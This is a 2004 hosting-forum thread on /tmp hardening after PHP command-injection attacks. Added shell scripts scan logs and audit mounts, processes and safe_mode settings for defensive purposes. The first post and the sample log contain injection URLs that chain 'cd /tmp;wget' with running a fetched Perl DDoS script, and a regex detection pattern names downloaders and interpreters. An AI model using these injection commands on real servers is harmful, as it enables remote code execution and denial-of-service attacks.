
More /tmp Security Problems.

Discussion in 'Security' started by HostDime, Feb 4, 2004.

  1. HostDime

    HostDime Well-Known Member
    PartnerNOC

    Now before anyone yells, all our servers have /tmp noexec,nosuid,nodev. This is all good for compiling and running programs, but here's the problem now... Many writers are writing insecure PHP journal scripts, and many other PHP programs which are vulnerable. Lately I saw udp.pl on a server when it was a little slow. It seems they had gotten the program installed via

    http://userssite.com/index.php?x=cd /tmp;wget mysuperhackerpalace.com/udp.pl;/usr/bin/perl udp.pl 127.0.0.1

    Now that's not the exact script or their site, and they didn't DDoS localhost. I'm giving everyone an idea. Now... anyone really poses a threat on your server now. Simple PHP shell + udp.pl = DDoS. And even if the person did not do it (the case with the insecure PHP script), every account poses a threat. I have basically just been searching logs and /tmp for any traces for now. What could be a fix on this? Could you somehow make perl not run scripts from tmp? Sigh.

    :rolleyes:
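    The post above says the only thing being done so far is searching the logs. As an added example (not from this thread or from cPanel), here is a small POSIX shell scanner that runs over Apache access-log lines and flags the kind of query string described: a shell separator followed by a downloader or an interpreter. It URL-decodes the usual encodings first so that `cd%20/tmp;wget` and `cd+/tmp|curl` are both caught. The log lines, hostnames and addresses are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the thread: flag access-log requests whose query
# string chains a downloader or interpreter after ';', '|' or '&'.
set -eu

# Decode the encodings that commonly hide the separators and spaces
# (%20 and '+' for space, %3B for ';', %7C for '|', %26 for '&').
url_decode() {
    sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/%3[Bb]/;/g' \
        -e 's/%7[Cc]/|/g' -e 's/%26/\&/g'
}

# Print every line whose query string (after the '?') has a separator followed
# by wget/curl/fetch/lynx or an interpreter. The 'cd /tmp' prefix is not
# required, so a variant that skips it is still reported.
find_injection_hits() {
    url_decode < "$1" \
      | grep -Ei '\?[^"]*[;|&][[:space:]]*(wget|curl|fetch|lynx|/usr/bin/perl|perl|sh|bash)([[:space:]]|$)' \
      || true
}

# Number of flagged lines, as a plain integer.
count_injection_hits() {
    find_injection_hits "$1" | wc -l | tr -d ' '
}

# Constructed sample log (not real traffic); the two 10.0.0.9 lines carry the
# injection pattern, the other two are ordinary requests.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [04/Feb/2004:10:00:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 1523
10.0.0.9 - - [04/Feb/2004:10:00:07 -0500] "GET /index.php?x=cd%20/tmp;wget%20example.invalid/udp.pl;/usr/bin/perl%20udp.pl HTTP/1.1" 200 12
10.0.0.7 - - [04/Feb/2004:10:00:09 -0500] "GET /gallery.php?img=12 HTTP/1.1" 200 8840
10.0.0.9 - - [04/Feb/2004:10:00:11 -0500] "GET /index.php?x=cd+/tmp|curl+-O+example.invalid/x.pl HTTP/1.1" 200 12
EOF

# Usage: point it at a real log instead of the sample, e.g.
#   find_injection_hits /usr/local/apache/logs/access_log
find_injection_hits "$SAMPLE_LOG"
printf 'hits: %s\n' "$(count_injection_hits "$SAMPLE_LOG")"
```

The pattern is deliberately broad (any separator followed by an interpreter name), so review the hits by hand; the aim is to surface the accounts whose scripts are being driven this way, which is the search the post describes doing manually.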
     
  2. Marty

    Marty Well-Known Member

    Mmm, that is interesting.

    I think mod_security would probably deflect the request before they were able to upload. We just started running this on our servers.

    www.modsecurity.org
     
  3. jamesbond

    jamesbond Well-Known Member

    If wget is not used by any users (except for root) then a simple fix would be to chmod wget to 700.
     
  4. Silverado

    Silverado Well-Known Member

    Doesn't /scripts/securetmp take good care of this issue?

    I used it on all my servers and it works great.
     
  5. HostDime

    HostDime Well-Known Member
    PartnerNOC

    No, it does not. You can have noexec,nosuid,nodev,nouser and perl will work.
     
  6. rs-freddo

    rs-freddo Well-Known Member

    If you use the securetmp system it basically stops:
    /tmp/hacker.pl
    from being executed;
    however, it does not stop:
    /usr/bin/perl /tmp/hacker.pl
    Why?
    Because in the first instance you are executing a script in /tmp;
    in the second instance you are executing software in /usr/bin and just parsing the file in /tmp.

    This is why I'm pushing cPanel for a chrooted filesystem. Securetmp will only work for the REALLY DUMB hackers. Securetmp is only a very temporary band-aid.
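    The distinction drawn above (noexec blocks `/tmp/hacker.pl` but not `/usr/bin/perl /tmp/hacker.pl`) means that checking mount flags is necessary but not sufficient. As an added example, not from this thread or from cPanel, the POSIX shell helpers below do both halves of the check: one confirms a mounts entry for a given mount point carries noexec,nosuid,nodev, the other recognises a process command line in which an interpreter is handed a script under /tmp or /var/tmp, and a third walks the live process table with it. The interpreter list, paths and the sample mounts line are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the thread: audit both the /tmp mount flags and
# the running interpreters, because the flags alone do not stop
# "/usr/bin/perl /tmp/script.pl".
set -eu

# Returns 0 when the given /proc/mounts or /etc/mtab line is for the wanted
# mount point and its options include all of noexec, nosuid and nodev.
# Usage: has_hardening_flags "<mounts line>" /tmp
has_hardening_flags() {
    line=$1
    want=$2
    mountpoint=$(printf '%s\n' "$line" | awk '{print $2}')
    opts=$(printf '%s\n' "$line" | awk '{print $4}')
    [ "$mountpoint" = "$want" ] || return 1
    for flag in noexec nosuid nodev; do
        case ",$opts," in
            *",$flag,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Returns 0 when a command line is an interpreter (optionally with flags such
# as -w) being given a script that lives under /tmp or /var/tmp. A bare
# "/tmp/hacker.pl" does not match: that is the case noexec already blocks.
# Usage: is_interpreter_running_tmp_script "<cmdline>"
is_interpreter_running_tmp_script() {
    printf '%s\n' "$1" | grep -Eq \
      '^(/(usr/)?(local/)?bin/)?(perl|python[0-9.]*|php|ruby|sh|bash|dash)([[:space:]]+-[^[:space:]]+)*[[:space:]]+(/var)?/tmp/'
}

# Walk the live process table (Linux /proc; cmdline is NUL-separated) and
# print every pid whose command line matches. Always returns 0 so that it can
# run under set -e even when nothing is found.
audit_live_processes() {
    for f in /proc/[0-9]*/cmdline; do
        [ -r "$f" ] || continue
        cmd=$(tr '\0' ' ' < "$f" 2>/dev/null) || continue
        if is_interpreter_running_tmp_script "$cmd"; then
            pid=${f#/proc/}
            pid=${pid%/cmdline}
            printf 'pid %s: %s\n' "$pid" "$cmd"
        fi
    done
    return 0
}

# Constructed sample mounts line (not read from a real system).
SAMPLE_MOUNT='/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0'

# Usage on a real box: feed the actual mounts entry, then audit processes.
#   has_hardening_flags "$(grep ' /tmp ' /proc/mounts)" /tmp && echo "/tmp flags ok"
if has_hardening_flags "$SAMPLE_MOUNT" /tmp; then
    printf '%s\n' "sample /tmp entry has noexec,nosuid,nodev"
fi
audit_live_processes
```

Run the process audit from cron or a monitoring hook; a hit is a strong signal that an account-level script, not the mount configuration, is what needs attention.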
     
  7. Website Rob

    Website Rob Well-Known Member

    As security is done in layers, having safe_mode "ON" would have prevented the upload to the 'tmp' and stopped the problem before it could start. Others may not agree with using this method, but I have found the majority of scripts (PHP) do not require it to be "OFF", and those that do make a request so it can be set up for their account.

    Keeping track of who has safe_mode "OFF" makes it easy to track when 'tmp' is used for nefarious purposes.
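    Keeping that list by hand is error-prone, so here is an added example (not from this thread or from cPanel) of a POSIX shell audit that reads an Apache configuration and reports every virtual host whose PHP safe_mode is not switched on. It assumes the per-account setting is made with mod_php's `php_admin_flag` directive inside each `<VirtualHost>` block; a vhost that says nothing is reported as "inherited", because it follows whatever the global php.ini says. The httpd.conf fragment and hostnames are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the thread: list vhosts without safe_mode On.
set -eu

# Print "<ServerName> <state>" for every <VirtualHost> whose safe_mode is not
# On. state is "off" when the vhost disables it explicitly and "inherited"
# when the vhost has no php_admin_flag safe_mode line at all.
vhosts_without_safe_mode() {
    awk '
        tolower($1) == "<virtualhost"  { name = "(no ServerName)"; state = "inherited" }
        tolower($1) == "servername"    { name = $2 }
        tolower($1) == "php_admin_flag" && tolower($2) == "safe_mode" {
            state = tolower($3)
            if (state == "1" || state == "true")  state = "on"
            if (state == "0" || state == "false") state = "off"
        }
        tolower($1) == "</virtualhost>" { if (state != "on") print name, state }
    ' "$1"
}

# Constructed httpd.conf fragment: alpha is hardened, beta opts out,
# gamma never mentions safe_mode.
CONF=$(mktemp)
trap 'rm -f "$CONF"' EXIT
cat > "$CONF" <<'EOF'
<VirtualHost 10.0.0.1:80>
    ServerName alpha.example.invalid
    DocumentRoot /home/alpha/public_html
    php_admin_flag safe_mode On
</VirtualHost>
<VirtualHost 10.0.0.1:80>
    ServerName beta.example.invalid
    DocumentRoot /home/beta/public_html
    php_admin_flag safe_mode Off
</VirtualHost>
<VirtualHost 10.0.0.1:80>
    ServerName gamma.example.invalid
    DocumentRoot /home/gamma/public_html
</VirtualHost>
EOF

# Usage on a real server: vhosts_without_safe_mode /usr/local/apache/conf/httpd.conf
vhosts_without_safe_mode "$CONF"
```

The "inherited" entries are the ones to watch: whether they are actually protected depends on the global php.ini, so a change there silently changes every account that does not set the flag itself.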
     
  8. damainman

    damainman Well-Known Member

    You can have safemode on/off per user account?
     